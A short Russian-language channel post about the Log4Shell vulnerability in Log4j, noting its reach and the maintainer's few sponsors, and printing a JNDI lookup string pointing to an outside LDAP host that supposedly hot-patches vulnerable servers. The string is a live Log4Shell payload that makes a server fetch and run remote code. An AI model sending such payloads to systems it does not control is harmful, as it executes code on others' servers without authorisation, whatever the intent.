Вы наверняка уже слышали про нашумевшую уязвимость Log4Shell, | 👾 твой cto

Вы наверняка уже слышали про нашумевшую уязвимость Log4Shell, которая позволяла выполнять произвольный код на серверах Steam, AWS, Cloudflare, iCloud и миллионах других. Отдельно стоит отметить, что уязвимость находится в широкоиспользуемой open-source библиотеке, у главного мейнтейнера которой на момент открытия уязвимости было всего 5 спонсоров.

А вот самое красивое:

${jndi:ldap://hotpatch.log4shell.com:1389/a}

Так как выполнить можно абсолютно любой код, то отправив эту строчку на уязвимый сервер вы... пропатчите Log4j и пофиксите эту уязвимость с помощью самой уязвимости